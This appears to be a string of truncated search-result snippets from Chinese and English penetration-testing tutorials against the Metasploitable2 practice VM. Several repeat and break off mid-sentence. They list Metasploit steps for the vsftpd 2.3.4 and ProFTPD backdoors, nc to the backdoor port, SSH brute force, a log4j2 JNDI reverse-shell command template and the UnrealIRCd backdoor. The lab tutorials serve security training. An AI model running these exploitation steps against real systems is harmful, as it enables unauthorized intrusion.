auxiliary/scanner/ftp/anonymous(探测ftp是否允许匿名登录),没有结果。。但是能看到服务版本是2.3.4. 寻找ftp2.3.4版本的漏洞,然后使用这个漏洞exploit/unix/ftp/proftpd_133c_backdoor(在未经身份验证的情况下获取 root 权限) 到此成功利用ftp漏洞获取了靶机的shell。 ssh(22) 探测ssh版本信息(auxiliary/scanner/ss...
1、打开终端,进入msfconsole 2、利用search命令查找我们需要的漏洞模块vsftpd(笑脸漏洞) searsh vsftpd 1. 3、使用漏洞,输入命令 use exploit/unix/ftp/vsftpd_234_backdoor或者use 0 1. 4、查看需要设置的参数 show options 1. 5、只需设置目标主机的IP即可 set rhost 192.168.0.70 1. 6、设置好后便可以开...
因为之前端口扫描的时候,存在一个80端口开放,并且这是个web,而且这是我搭建的存在apache log4j2的漏洞 抓包测试判断是否存在log4j2漏洞测试存在log4j2漏洞,接下来构造反弹shell的payload(利用别人已经构造的ext)。 JNDI注入工具的语句格式:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “命令” -A “...
攻击机:kali linux IP:192.168.1.133 靶机:Metasploitable2 IP:192.168.1.136 1、搜索可用攻击模块:search vsftpd 2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor 查看需要设置的参数:show options 需要设置目标ip和端口(默认21) 3、设置目标主机地址:192.168.1.136 4、 运行:run 此时已建立shell连接...
靶机:Metasploitable2 IP:192.168.1.136 1、搜索可用攻击模块:search vsftpd 2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor 查看需要设置的参数:show options 需要设置目标ip和端口(默认21) 3、设置目标主机地址:192.168.1.136 4、 运行:run 此时已建立shell连接 ...
Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一...
ftp 172.16.5.17 这里telnet也可以激活笑脸 账号随便输入一个 Root:) Password:随便输入一个 已经创建好了后面6200后门端口 Nc连接:nc 172.16.5.17 22端口:直接暴力破解 Searchssh_login 搜索模块 Use auxiliary/scanner/ssh/ssh_login 使用模块 Set RHOST 172.16.5.198 设置目标地址 ...
Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络
靶机:Metasploitable2 IP:192.168.1.136 1、搜索可用攻击模块:search vsftpd 2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor 查看需要设置的参数:show options 需要设置目标ip和端口(默认21) 3、设置目标主机地址:192.168.1.136 4、 运行:run 此时已建立shell连接 ...
On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor thatwent unnoticed for months- triggered by sending the letters "AB" following by a system command to the server on any listening port. Metasploit has amoduleto exploit this in order to gain an ...